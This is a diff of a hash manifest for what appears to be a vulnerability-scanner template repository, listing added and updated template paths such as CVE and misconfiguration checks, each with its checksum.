helpers/wordpress/plugins/really-simple-ssl.txt:155bc49c185468ac54a126a93c1e2b5921997fc1 helpers/wordpress/plugins/redirection.txt:392ee3765c26f4ca0b6935f9bb0f006c2354af12 
@@ -403,7 +514,7 @@ helpers/wordpress/plugins/updraftplus.txt:b942f95288dbef535d6c4bd8ba4db5b1dea759 helpers/wordpress/plugins/use-any-font.txt:051efab22f2c58c6d458654f9abb0b0648c4743d helpers/wordpress/plugins/user-role-editor.txt:60504bf1a7119035ab8f7a2f8b0e566bf4a6dff3 helpers/wordpress/plugins/velvet-blues-update-urls.txt:abe23e8d51de58b629ca74fce30438ee71509264 -helpers/wordpress/plugins/w3-total-cache.txt:7cfe54f27289e2e996bf2e77df14202ff94111f9 +helpers/wordpress/plugins/w3-total-cache.txt:0c6799f2e85eccc7061443f76e45b7b268892b58 helpers/wordpress/plugins/webp-converter-for-media.txt:479e7dca067e6bab09a59b119f7c54a136587a83 helpers/wordpress/plugins/webp-express.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/widget-importer-exporter.txt:92dd42eb7b198ffac6578eae5bcfc969383d138c @@ -424,7 +535,7 @@ helpers/wordpress/plugins/wordpress-seo.txt:6b07fbd06e719e91870fe311db76d2c482b6 helpers/wordpress/plugins/worker.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/wp-fastest-cache.txt:a8ca9029438bddc6caceb1aae00246b568722654 helpers/wordpress/plugins/wp-file-manager.txt:463810c87a57507ca005dd6a19aab00e209bb4b7 -helpers/wordpress/plugins/wp-google-maps.txt:f593dd38154ae03f8ad23a9a3382622eee3e3bf4 +helpers/wordpress/plugins/wp-google-maps.txt:0a69f6911ff2e690d4b2523adc6f80e7d6b0de42 helpers/wordpress/plugins/wp-mail-smtp.txt:49845bdbd9ea8362a0f3bc2e6dad36c9121ce2d6 helpers/wordpress/plugins/wp-maintenance-mode.txt:d3a5debecb62b3b70bbb48d3756a5239e112bc34 helpers/wordpress/plugins/wp-migrate-db.txt:d3a5debecb62b3b70bbb48d3756a5239e112bc34 
@@ -439,10 +550,10 @@ helpers/wordpress/plugins/wp-statistics.txt:2e3c072dacb785efa6a78df46e04b6abf58c helpers/wordpress/plugins/wp-super-cache.txt:b600bf3dacb5d620338f6412a343d3349ec570bf helpers/wordpress/plugins/wp-user-avatar.txt:90e21e6589c03430b25fc4c525c14a0d6aff8619 helpers/wordpress/plugins/wpcf7-recaptcha.txt:e864410c570d87244a122a31198944fa5ab9260e -helpers/wordpress/plugins/wpcf7-redirect.txt:40d69a31b1f9d238ca1c38a357e6846c514e2e9f +helpers/wordpress/plugins/wpcf7-redirect.txt:6dd1f25f2a4f5c9c73793bed06929318969169c0 helpers/wordpress/plugins/wpforms-lite.txt:34c4874a9545ff46dc1d995437c2ee0879c54e33 helpers/wordpress/plugins/wps-hide-login.txt:fa12796bd5aa83d02e53616812c25306cd1d6917 -helpers/wordpress/plugins/wpvivid-backuprestore.txt:83a35ac526394e5168b118d107d874266be82e5e +helpers/wordpress/plugins/wpvivid-backuprestore.txt:7c522bb9ef8e9e38f71b7fc4ab4a0af3836c75df helpers/wordpress/plugins/yith-woocommerce-compare.txt:fc4929308af8b80845b3c743a30013a669a02875 helpers/wordpress/plugins/yith-woocommerce-wishlist.txt:8fb4537f45c70359a62b29c044ee196cd3454f82 http/cnvd/2017/CNVD-2017-03561.yaml:74103420668209b795d1397008e67affd3e0856c @@ -469,6 +580,8 @@ http/cnvd/2021/CNVD-2021-17369.yaml:65beb26738c0a7a0b7ac10a854f9fd6650ccc084 http/cnvd/2021/CNVD-2021-26422.yaml:7aaf1149908731caaa93d8e0fb1e0eca9530051c http/cnvd/2021/CNVD-2021-28277.yaml:524a90b6c3bf5c2bb0b4dd821d384f1f98c80765 http/cnvd/2021/CNVD-2021-30167.yaml:4eb3fbb771c370b1e9d8f31b76c3b79a892779dc +http/cnvd/2021/CNVD-2021-41972.yaml:f254fd8ba373fa95a4744b259048d692ef081572 +http/cnvd/2021/CNVD-2021-43984.yaml:a02d85fe2f67fe05c67462dbea8fcb7dedcbc2cc http/cnvd/2021/CNVD-2021-49104.yaml:e676d4620da1cd57bc021c49d3d7c7821eada127 http/cnvd/2022/CNVD-2022-03672.yaml:e10e6a3a8c0c9527e640fcca1655186f039ce3e9 http/cnvd/2022/CNVD-2022-42853.yaml:b09d41d36a02b364b40898c724386b30d575af2f 
@@ -968,6 +1081,7 @@ http/cves/2018/CVE-2018-12634.yaml:97f1cfdcbed90fb7a31411006fdf658723d04193 http/cves/2018/CVE-2018-12675.yaml:22a40df123b30f46fd10da473215020c2a3791cf http/cves/2018/CVE-2018-1271.yaml:151efb498a9cd2aad7b7aacb5b37de5ee58327b5 http/cves/2018/CVE-2018-1273.yaml:5b87afb6192da9901417c7f9d9d0ef286ced97f2 +http/cves/2018/CVE-2018-12909.yaml:1419db77cb21559bbe19e4cc4eca4cf5c8275dda http/cves/2018/CVE-2018-12998.yaml:05880d1585240c7d2b744235a65126957833ed79 http/cves/2018/CVE-2018-1335.yaml:5b86c670cbc5b612963e0f62304f9504f970b6d8 http/cves/2018/CVE-2018-13379.yaml:1359999f23be6c6d94114f4a1d4e91d5cbf369ad @@ -1016,6 +1130,7 @@ http/cves/2018/CVE-2018-18608.yaml:11c471985c939bb113569900d36dc6539b6f1a57 http/cves/2018/CVE-2018-18775.yaml:27d22d6e651e771a3e3660ddeb3e8c08092b7c8c http/cves/2018/CVE-2018-18777.yaml:320f0f5bcd52004f83899fef362ef99d379f5510 http/cves/2018/CVE-2018-18778.yaml:3b5d9647173502652005c766bebbd56fee0c105e +http/cves/2018/CVE-2018-18809.yaml:785a7ad44a0d09128ff2abd3e8b578070b67dcb9 http/cves/2018/CVE-2018-18925.yaml:498b177f759a3ddde3e902f6234e85e824f1e777 http/cves/2018/CVE-2018-19136.yaml:dbd1e18154ab0ad6cbc7c9657d223e14b9829ed5 http/cves/2018/CVE-2018-19137.yaml:fbb0472e8dedfbca60c66a13eb7d32aace815602 @@ -1066,6 +1181,7 @@ http/cves/2018/CVE-2018-7467.yaml:23ada4871ce957b49f9e5c252244987a40bde1e1 http/cves/2018/CVE-2018-7490.yaml:e93fa5fb3a9e91d1ac01dba4749145eeb9a75b25 http/cves/2018/CVE-2018-7600.yaml:933802ea6d2c85fe805792ba35c2f58d6dfccc07 http/cves/2018/CVE-2018-7602.yaml:48a17f9a167a9d3849311bd21f0b88492f3d5e5d +http/cves/2018/CVE-2018-7653.yaml:dbcf206477385f26968093eb6a1217d868106fa7 http/cves/2018/CVE-2018-7662.yaml:96fae0e9203351425c2ca823e809f5887faaddd3 http/cves/2018/CVE-2018-7700.yaml:3f8650ee87c571398f324e78fe09ac165bc8c7c5 http/cves/2018/CVE-2018-7719.yaml:9e9b2cccbc6af6ba34cfeeb430b70e9c2595508d 
@@ -1138,6 +1254,7 @@ http/cves/2019/CVE-2019-15811.yaml:a426f0a679eacb10ac1e493b2111ee93b20b96c8 http/cves/2019/CVE-2019-15858.yaml:9548afb2b04483ce036dd3d6a557351e181ff430 http/cves/2019/CVE-2019-15859.yaml:12f3e9efb3f16c6076d21b0903b95dd8267e95a9 http/cves/2019/CVE-2019-15889.yaml:663437a3280f3bb361e802d414de1bcbbb6754b0 +http/cves/2019/CVE-2019-16057.yaml:d84ab085128ca20ed8a3026a3ed7a57fe63de8aa http/cves/2019/CVE-2019-16097.yaml:4ad590e1b47160f214cd2ea69ddf2b627dd65b3e http/cves/2019/CVE-2019-16123.yaml:833d19144df61171ceeccddb50a775b03d0bb340 http/cves/2019/CVE-2019-16278.yaml:18e2a25a922a95014b7c74e1204cff6fee67d1a3 @@ -1206,6 +1323,7 @@ http/cves/2019/CVE-2019-6340.yaml:ed1a02bf0e73e6fbc08dea0119c5f930471971ce http/cves/2019/CVE-2019-6715.yaml:45c1640d8469a8a749fedd7c93bbeac7490a5e82 http/cves/2019/CVE-2019-6799.yaml:b2a7f1f19ef09e8506ffd3d5e377567f90600df0 http/cves/2019/CVE-2019-6802.yaml:c9541edfa58fd9ff6c099d8ca29fb47866b72639 +http/cves/2019/CVE-2019-7192.yaml:4ec47a65ae6fc5c99b059966f308dc0cd1750026 http/cves/2019/CVE-2019-7219.yaml:a2da9306401358762f754694717c693139dfb634 http/cves/2019/CVE-2019-7238.yaml:52b2d6267b7735c92d24cdd393a794f6f2fe2734 http/cves/2019/CVE-2019-7254.yaml:8c808a17af2bdd5d1805b289214942d19b500eeb @@ -1236,7 +1354,7 @@ http/cves/2019/CVE-2019-9955.yaml:fb0832b1b18f1930d9d347d5e22f3ccdd9ae5117 http/cves/2019/CVE-2019-9978.yaml:29fa05916d940a02b2052750609450962d826369 http/cves/2020/CVE-2020-0618.yaml:fb8a86443513fb8dfb8bfd4ef48846be61fbd046 http/cves/2020/CVE-2020-10148.yaml:785c887c894285e141a8c3ec6d81dbf0ca321825 -http/cves/2020/CVE-2020-10199.yaml:9a25acb9bad311be433511f6ef601a4cc70f50c7 +http/cves/2020/CVE-2020-10199.yaml:78dd9d79772f51d38fd8d5422e9e5f7502a8b096 http/cves/2020/CVE-2020-10546.yaml:064a059d47a385fd83a9b1b62793b5891e9e5b07 http/cves/2020/CVE-2020-10547.yaml:58b39f2460d859c96b62ab0697151b9d6334808e http/cves/2020/CVE-2020-10548.yaml:379ae6d4c78187bc1e20dcf6ec9fb27ede275db3 
@@ -1576,7 +1694,7 @@ http/cves/2021/CVE-2021-24407.yaml:930d2dc64468c8ee7d9aa5e71be9de535748b6ca http/cves/2021/CVE-2021-24435.yaml:89522ee18258ad0300e1bb5022d44880b1808787 http/cves/2021/CVE-2021-24436.yaml:b63bfee3cabf85be86e0559dc7dfa913491d57fd http/cves/2021/CVE-2021-24452.yaml:9d8db2861a445eff4ef21b5a784ff3e7aa639189 -http/cves/2021/CVE-2021-24472.yaml:12ab395fa49ed939490b6790b736abb36483ebbc +http/cves/2021/CVE-2021-24472.yaml:616084029cea76b6edd27c50e179d52f4d16cbff http/cves/2021/CVE-2021-24488.yaml:ae6777b8174869399f3d89b085bbcc20ef392ef2 http/cves/2021/CVE-2021-24495.yaml:484761ea40b28577aee44a0caed0863901524fc4 http/cves/2021/CVE-2021-24498.yaml:fc1264eba2f20f567ae8317d0bcb12fdccf327dc @@ -2039,6 +2157,7 @@ http/cves/2022/CVE-2022-23944.yaml:d9d019b4ae2d4f19d03f9f4a14babd56272bfcf2 http/cves/2022/CVE-2022-24112.yaml:d34021fc20a99f80ccebfec2f7fc3b6ad8033abb http/cves/2022/CVE-2022-24124.yaml:99e4c1abce61bf897197c8dbcda023fb9335f601 http/cves/2022/CVE-2022-24129.yaml:295cf475a2a171e30460dc0bfefea23b188dec6f +http/cves/2022/CVE-2022-2414.yaml:d3b98c7938a995086c756bf4e9643564d4b001f7 http/cves/2022/CVE-2022-24181.yaml:e9f5dfcb7eb017affad3d42c6d08005a81396252 http/cves/2022/CVE-2022-24223.yaml:84ee3c19af6211ad6b830fb6fe2f6cf3170cfac4 http/cves/2022/CVE-2022-24260.yaml:dc9c44eb66cf123111e5f2983b33902cea1dc509 
@@ -2347,7 +2466,9 @@ http/cves/2023/CVE-2023-20888.yaml:df29cd30e3fe76946c2e0aacd563a25f1665b662 http/cves/2023/CVE-2023-20889.yaml:8b60fd0262fbec8c7e8e66f7e05d4d3f2adc8e04 http/cves/2023/CVE-2023-2122.yaml:b1d9f77dedde759ed31ecde571e1e5f961cb9f7d http/cves/2023/CVE-2023-2130.yaml:60ab68d072417d5d31b5d03c399196025f84750a -http/cves/2023/CVE-2023-2178.yaml:1db346cda0cee1d92f201268d957fa032d4cfca9 +http/cves/2023/CVE-2023-2178.yaml:efa11c92343544027f10593b7adcde5139d531fa +http/cves/2023/CVE-2023-22478.yaml:d2fc4bac89567133cbaad8b064d8634dafc6df7a +http/cves/2023/CVE-2023-22480.yaml:0d7604eb3512ff8cf33e5dad1e9d7a3fc8d7073c http/cves/2023/CVE-2023-2252.yaml:8e7b84e58291c374ae90358d336eb5115a7490a5 http/cves/2023/CVE-2023-22620.yaml:ed63a60eb6893b257eaa028d637ae2cb8663604b http/cves/2023/CVE-2023-2272.yaml:23e0a5d72fb10c5fbbed02fec5f2fd6ef4d60528 @@ -2453,6 +2574,8 @@ http/cves/2023/CVE-2023-3765.yaml:0edb8eb591f0b1307819257e7857613ba44f7b6e http/cves/2023/CVE-2023-38205.yaml:9716500ff3f3c2c4e3d84964f251ebdc29a2953d http/cves/2023/CVE-2023-3836.yaml:aee81a16198f116f8a2c42c889180f94667261ce http/cves/2023/CVE-2023-38646.yaml:67efb752090e5f27e0dc770008065458bbb2aba1 +http/cves/2023/CVE-2023-39120.yaml:c2e5b3bd997e2b6cb63530cc9c7bf1d0cce6e0b7 +http/cves/2023/CVE-2023-39143.yaml:470d4fc68ed1784cf1e3b644a7d694b0b62e5fb3 http/default-logins/3com/3com-nj2000-default-login.yaml:c00b706cfbbb60a4377ed00240d60f1b4679f18d http/default-logins/UCMDB/ucmdb-default-login.yaml:65a8ff54c063a35e251409ed8bfd1a93e50d42c2 http/default-logins/abb/cs141-default-login.yaml:8914cccfee6dfcbfbb632cf088ca7a33823561d6 
@@ -2476,6 +2599,7 @@ http/default-logins/apollo/apollo-default-login.yaml:e29e9d074df0b3924a5acfc795f http/default-logins/arl/arl-default-login.yaml:f449491ecb49f6eb89f974ecdf686ac041592b3e http/default-logins/audiocodes/audiocodes-default-login.yaml:8eebe238ed0b0ee2f1b5fdc0fa1e44393fffe0dc http/default-logins/azkaban/azkaban-default-login.yaml:280c8cd88baaf18d646f9e1a26f3ce74b15ffa33 +http/default-logins/bloofoxcms-default-login.yaml:6d0faf5b16348be86dff142f31c63f4d28b9fe78 http/default-logins/chinaunicom/chinaunicom-default-login.yaml:766879d4ad001d95405eedbd6cf41a721d1ed965 http/default-logins/cobbler/cobbler-default-login.yaml:fa301242a42149b251f4e3333a74bb80d1da8919 http/default-logins/cobbler/hue-default-credential.yaml:fb8188153e9f64e9b549221b1c25033762c5c01f @@ -2594,6 +2718,7 @@ http/exposed-panels/3cx-phone-management-panel.yaml:3eb2d8154e573059858105e073f8 http/exposed-panels/3cx-phone-webclient-management-panel.yaml:c173a5d07730d8a785cdeb3cdb2a4fed0203a159 http/exposed-panels/3g-wireless-gateway.yaml:dcaa4b4174f979e21ea56852c9ad7d17c529e61a http/exposed-panels/acemanager-login.yaml:8b685c9f8f0e76eebfe441a0a0ee57ce06738a8e +http/exposed-panels/acenet-panel.yaml:10488ae76749f37d0cde339f9f327ea35246b5c1 http/exposed-panels/achecker-panel.yaml:827d13ad03b96e2a3450040ae565ad66694dc3fa http/exposed-panels/acrolinx-dashboard.yaml:bfa6ce62056cbbb2acbab68e346f516d06135660 http/exposed-panels/active-admin-exposure.yaml:585334ddf9c81b0a9ed265cf884def04705a330f 
@@ -2690,6 +2815,7 @@ http/exposed-panels/biotime-panel.yaml:6338c59d6c66c8b340736b2900e077fdfaf0a554 http/exposed-panels/bitdefender-gravityzone.yaml:f94198978febf9daf21b03ae09371a15a7fa3f2b http/exposed-panels/bitrix-panel.yaml:8023bf14b595d7a7df9e23b1f35193c988f36232 http/exposed-panels/black-duck-panel.yaml:77b6163f94f4c5731be0388c1d1b3a76d4fda54c +http/exposed-panels/bloofoxcms-login-panel.yaml:86230092537193247cd7756bd142fce4c6f5b9fd http/exposed-panels/blue-iris-login.yaml:300a2b4a3c7dad20f872637c95f9a60c411ac148 http/exposed-panels/bmc/bmc-discovery-panel.yaml:5aab943397c954f2e06ebc31c5f30b94c4f90955 http/exposed-panels/bmc-panel-detect.yaml:f73d80f848b1f1c81470a571f29f86313e833129 @@ -2799,6 +2925,7 @@ http/exposed-panels/dericam-login.yaml:3403129db0d7ce6db006c2d346abc4e0a86dfeed http/exposed-panels/digitalrebar-login.yaml:c77759032fa4cfb2e16d172ba96226909f92cd55 http/exposed-panels/directadmin-login-panel.yaml:409b49e557aa98d97ca95d19fcb7039a4a840258 http/exposed-panels/directum-login.yaml:e52dd3da095158a998e1915406852ac23af12035 +http/exposed-panels/discuz-panel.yaml:7abbae0dfa797f17aa1c9eae77e59d17a080a46b http/exposed-panels/django-admin-panel.yaml:09597c15781c7c9fa66a81c56cdbdc1a71775d86 http/exposed-panels/docebo-elearning-panel.yaml:4d2678ae2206f6daadff3b6d910fde5e7a9459e1 http/exposed-panels/dolibarr-panel.yaml:f81bb4e67b46c8071db9e24f0f4c48061eaa28e5 
@@ -3011,6 +3138,7 @@ http/exposed-panels/kfm/kfm-login-panel.yaml:3c4000f0fb9e6faaab11f7701e4b79c4d49 http/exposed-panels/kibana-panel.yaml:bf1b2cf8320bd2445aecc31e79e8164e5b8b2cfc http/exposed-panels/kiwitcms-login.yaml:44a2f15c561bd5a7300a34a1f7e7536fddf9704f http/exposed-panels/kkfileview-panel.yaml:28b5ea59bab3179dd712606b3cbc169ec2326206 +http/exposed-panels/kodak-network-panel.yaml:4d858dab347a56ab3ae4b5cd853e2567680ff3ce http/exposed-panels/konga-panel.yaml:2751b288eaa3d48beb221bf0405d8a0170cc6e6d http/exposed-panels/kraken-cluster-monitoring.yaml:cad4a2449b89dd228223f9f3930213d037e0b9e4 http/exposed-panels/kronos-workforce-central.yaml:073b910ea0f7318d8998b79b8dc9bff7a2817239 @@ -3080,6 +3208,7 @@ http/exposed-panels/monitorix-exposure.yaml:70dcdd5f03cf2d14a4c03731ee17b7485ea0 http/exposed-panels/monstra-admin-panel.yaml:1391177a3426d2e574b89484a7038431269e6906 http/exposed-panels/movable-type-login.yaml:12b897f6affc955633419d6865b12442b64bbd6c http/exposed-panels/mpftvc-admin-panel.yaml:18895db09762ff1b99f12713d6f84e7a0564ea8b +http/exposed-panels/mpsec-isg1000-panel.yaml:6ba593c370a075718fb5d195afdc15afb3b78f95 http/exposed-panels/ms-adcs-detect.yaml:6cc131403ee22348fd2f229435e2cfb35b94a158 http/exposed-panels/mspcontrol-login.yaml:6787b3684e2320f8cc6d0eb5e16b0dda4f99aa9e http/exposed-panels/mybb/mybb-forum-install.yaml:3d6f3047c408a07b8f2435461ef7873d9c3791ca 
@@ -3754,6 +3883,7 @@ http/exposures/files/sensitive-storage-exposure.yaml:2e90d17dba6672057ac88ab8902 http/exposures/files/service-account-credentials.yaml:3e3a06a18bed6e7310a60b9c31a0a1b1ce0b693c http/exposures/files/shellscripts.yaml:9c1b07550699aa6950f6ef7ddffde953a6c1608d http/exposures/files/snyk-ignore-file-disclosure.yaml:1617a8d58cd0e67476ca0c5fe856b5d8acef7db5 +http/exposures/files/socks5-vpn-config.yaml:bae4ecdf2ee9b64b89eb63d1bb64a6b5369604e8 http/exposures/files/styleci-yml-disclosure.yaml:c15cab7ffb067a2c0307d80cc910e5c008eb789c http/exposures/files/svn-wc-db.yaml:f92f07cc8827cdff2d792ca47b159ae58ca2f686 http/exposures/files/symfony-properties-ini.yaml:f12a501782abe0fb30638a4ee7aeeb8529631dd6 
@@ -4117,13 +4247,16 @@ http/misconfiguration/aws-redirect.yaml:4ed240934eb9c67becc2ab090ce768f9c05376c9 http/misconfiguration/aws-s3-explorer.yaml:960a58b92de23a0a68fbe88d8138e8bc045470d3 http/misconfiguration/aws-xray-application.yaml:d2e6d1d3565995c552f043c019de44a454e920ae http/misconfiguration/awstats-listing.yaml:cefec72eb3bf609f09779109eef39dfa9e62795b +http/misconfiguration/bitbucket-auth-bypass.yaml:689817c8f5989e7501fcfd9738d8039bc4994923 http/misconfiguration/bitbucket-public-repository.yaml:3ae328db3b76977394dca6df4b06d9d1a2402223 http/misconfiguration/blackbox-exporter-metrics.yaml:23bbd2929451b68aa7b0059bd18ba51643a41285 http/misconfiguration/bootstrap-admin-panel-template.yaml:01cca0503a1b23ed01e57d24b98bc4c1c67712f4 http/misconfiguration/bravia-signage.yaml:112b33d9332d3e80f0871c37adf7f3736d986d0f http/misconfiguration/browserless-debugger.yaml:a3a45ae884e34deb54c96476f31141b5338cd4f8 http/misconfiguration/cadvisor-exposure.yaml:7c087da24b9bab3e79ddabea84414c9f4b75fc28 +http/misconfiguration/casdoor-users-password.yaml:96ac1caebc9a6bc8201c528165755cfd314def1d http/misconfiguration/cgi-test-page.yaml:a4912db83100bdde0dd7e52454da25c7c716dbb3 +http/misconfiguration/clickhouse-unauth-api.yaml:429e4136878d2b2845288445d3b13929b145fb90 http/misconfiguration/clockwork-dashboard-exposure.yaml:e05c36e876b9bd13b7f444195bcd02e83068a3d0 http/misconfiguration/cloud-metadata.yaml:8778d2ecf82407b77b95a567d76fbd40a8d11e94 http/misconfiguration/cloudflare-image-ssrf.yaml:5cde64e35a786a2fed9498626ebaaea5429f7997 
@@ -4289,6 +4422,7 @@ http/misconfiguration/installer/vtiger-installer.yaml:076b0cac3812089d8b473161c1 http/misconfiguration/installer/webasyst-installer.yaml:45036a303e7bd289c6dee8ee6ccbaafcc78a9e1a http/misconfiguration/installer/webuzo-installer.yaml:af0d1ac1efe2f187e932031756dbde108aeb4927 http/misconfiguration/installer/wp-install.yaml:7263f4ac7377b12614b0480f0da9c47264a8854e +http/misconfiguration/installer/yzmcms-installer.yaml:444353079eddec6a26731f0f1834af2c6be6cf48 http/misconfiguration/installer/zenphoto-setup.yaml:9730edcaf481dd4e868f956e698001f4bdf268ed http/misconfiguration/internal-ip-disclosure.yaml:5b172cc1e7c7baa6ab5dfd5ac833c27175ebf020 http/misconfiguration/iot-vdme-simulator.yaml:20c893d91d0de38290ec70c12bb5003944c68f84 @@ -4414,6 +4548,7 @@ http/misconfiguration/slurm-hpc-dashboard.yaml:9a246fb5510d1f54acef4b6459d51484b http/misconfiguration/smarterstats-setup.yaml:eb3f0f9cdd11255b5ed687641638274f50529e15 http/misconfiguration/smokeping-grapher.yaml:ac670f706687c77b750a9c87c4c33d19b7fb5212 http/misconfiguration/solr-query-dashboard.yaml:6e2030ec31127bd6f7e33617bff53b2c78cccea9 +http/misconfiguration/sonarqube-projects-disclosure.yaml:cfc3aa5d5e0f62bc804741c8606fc0bf20382f57 http/misconfiguration/sonarqube-public-projects.yaml:e9486ffa86b355f1f55a8df80382304873664b0d http/misconfiguration/sony-bravia-disclosure.yaml:eb55d61f0b5fc907b2e5ca2796b80097279fabe7 http/misconfiguration/sound4-directory-listing.yaml:a42e79dbb8d265dc1c8ff6154995443b151bc659 
@@ -5497,7 +5632,7 @@ http/technologies/prestashop-detect.yaml:d1d7044aeddb47830b4bcc461be50a6ef66aa5b http/technologies/projectsend-detect.yaml:0fc088308432bac5879d6d7688a737b0bb2a2cf3 http/technologies/prtg-detect.yaml:febc67d4ab8496a0b8bbf435d7e7613678836085 http/technologies/puppet-node-manager-detect.yaml:2924aa577fc52f283605b5b22d33d59780f9bf7e -http/technologies/puppetdb-detect.yaml:892db35c87ed6c7d08cf30cf540c4df810e6442c +http/technologies/puppetdb-detect.yaml:904453a29729011ad113e744ae1cca0dfdc1e76d http/technologies/puppetserver-detect.yaml:e9264ce1e31f3e1d706b4c712ef05eeb932ebc8c http/technologies/pypiserver-detect.yaml:0639f781b6c6224d8fc521c847c3bfba5e5df9d2 http/technologies/redcap-detector.yaml:8b7087c247848dd70271ccdc04815919e650850c @@ -5757,7 +5892,7 @@ http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbb http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 -http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee +http/technologies/wordpress/plugins/wp-google-maps.yaml:f2f4afa59a5450b81aebf668215d5659c9efc663 http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e 
@@ -6048,6 +6183,7 @@ http/vulnerabilities/avtech/avtech-dvr-ssrf.yaml:d2c2b49be9bad9fd0753c090a86c4aa http/vulnerabilities/avtech/avtech-unauth-file-download.yaml:15e280ee1d7344056e946fd7f25420ab1346992f http/vulnerabilities/avtech/avtech-verification-bypass.yaml:9497012b89ada0ee6f48be0af32ef2033ec8a47a http/vulnerabilities/backdoor/jexboss-backdoor.yaml:2b4e3596c572a9d4429e1f23d90251d082d0fc89 +http/vulnerabilities/bsphp-info.yaml:9cd24e3775c993c85fea60e5499f2195e1d2ed23 http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml:8af1618f2246b3de340bb45ca72b6d8b864836a8 http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml:4d6b0c0c843d1f53d635bdf06533cf90c409c5b9 http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml:e83c7299fb5fa09709f46b540fa9a8f8273348c4 @@ -6061,6 +6197,7 @@ http/vulnerabilities/dedecms/dedecms-membergroup-sqli.yaml:079f7c526b753b2eff94c http/vulnerabilities/dedecms/dedecms-openredirect.yaml:d18f0f25b3f707f155997fc3a110916a5dcc5eeb http/vulnerabilities/dedecms/dedecms-rce.yaml:a8cd8335a29316ab09cd3261656db490f9671636 http/vulnerabilities/deos-open500-admin.yaml:63ac4937a413f49d1505817f8e9fc0511f63b9c3 +http/vulnerabilities/discuz/discuz-api-pathinfo.yaml:444702cfa9a835c2be5c9c85b4551a2441ad5102 http/vulnerabilities/drupal/drupal-avatar-xss.yaml:9209fbd5943d02081ba5021aacb2ad48a2435efe http/vulnerabilities/fastjson/fastjson-1-2-24-rce.yaml:ef76ddb5d08455550aed9bf6374b498336f70676 http/vulnerabilities/fastjson/fastjson-1-2-41-rce.yaml:bb939ed5879a96bfe1d7a21002713721b0e0e5e0 
@@ -6119,6 +6256,7 @@ http/vulnerabilities/jira/jira-unauthenticated-resolutions.yaml:2c518a580f881d8c http/vulnerabilities/jira/jira-unauthenticated-screens.yaml:cb84bd816e411ccabe0b240da3f406e8521caa07 http/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml:8751cd9b769aa5cee9312c5a20d1a2d28d00e195 http/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml:9d83d3d1e9839cd45bb507acf04d5411b6bd65cf +http/vulnerabilities/joomla/joomla-department-sqli.yaml:8973142a0b5898a703c053e2960dfad1bcec33b3 http/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml:9b35d1764a2220c1e4640f8ea0ffcecbe31b57d2 http/vulnerabilities/joomla/rusty-joomla.yaml:243d584db6ce05f2d2e43b09daa10eae5ff6a085 http/vulnerabilities/jupyter-notebook-rce.yaml:92676b19b8b57d1039df60dd120022030d31aa9a @@ -6133,6 +6271,8 @@ http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml:b7996ee696b7e034a http/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml:d6a9b4d056a672a3775099bb09c116df0cd7e3f9 http/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml:bd20aafab7a73674df1f7c9e5a9aa245604acfcc http/vulnerabilities/moodle/moodle-xss.yaml:e1bd6593e9607f34bf2bfbdbb66457d8e3414c49 +http/vulnerabilities/netmizer/netmizer-cmd-rce.yaml:3c1292d109834fc30f0ba09fd8c32ee992b34185 +http/vulnerabilities/netmizer/netmizer-data-listing.yaml:dcc8c105783d5a12f1cebcfb7ba14a17699ba727 http/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml:9e9a31fe009519cd70e31db31439f39402d5efd8 http/vulnerabilities/netsweeper/netsweeper-rxss.yaml:24bc1d31c3907a2dee1d372bad94baacbd069b7f http/vulnerabilities/nps/nps-auth-bypass.yaml:4d10c4d4199f3e410f50b641926d81ed455c2fb6 
@@ -6150,6 +6290,7 @@ http/vulnerabilities/other/WSO2-2019-0598.yaml:df55470aa07ec9e95302b08810aed2034 http/vulnerabilities/other/academy-lms-xss.yaml:da37dbfd84f6335eedc3484d58093c08ea08eb91 http/vulnerabilities/other/accent-microcomputers-lfi.yaml:fb8fd5c58a72fd879efa965d24cac4dcebb158b2 http/vulnerabilities/other/acme-xss.yaml:b292b0c0d7777a5315f06993a42056b1cb03b27f +http/vulnerabilities/other/acti-video-lfi.yaml:a06189fd9ae35d197d6f66faae91eea5013333db http/vulnerabilities/other/aerocms-sqli.yaml:65ddeaac3c3c25208e60dce7e39afeb45ddbc7cc http/vulnerabilities/other/alibaba-anyproxy-lfi.yaml:c97780044dd4078b77a6834381e07c43914a380d http/vulnerabilities/other/alumni-management-sqli.yaml:650cbd6f515fdcc2e66a3ea8b346f9c6367ed20b @@ -6157,6 +6298,8 @@ http/vulnerabilities/other/antsword-backdoor.yaml:93db1ae5508bca36eb0b8805353de9 http/vulnerabilities/other/asanhamayesh-lfi.yaml:0367c44590e30835f28a54e844817074b2c767ea http/vulnerabilities/other/aspnuke-openredirect.yaml:ab64189daa0a4907f91b5755fa710adef228f9be http/vulnerabilities/other/avada-xss.yaml:a87437e1cff6ab3fab62d590aedbe29557192743 +http/vulnerabilities/other/avcon6-execl-lfi.yaml:d5a44d62cfc407229ce1133f241b9c37cde1e519 +http/vulnerabilities/other/avcon6-lfi.yaml:af636608a20ffff0c681b0d7cca60e6b1c42b34a http/vulnerabilities/other/bems-api-lfi.yaml:c634436e12e06ed1871ce7ab0555411c7c1f4bd0 http/vulnerabilities/other/beward-ipcamera-disclosure.yaml:8cd184ca124b57a8dae72a078c9c00773df884a4 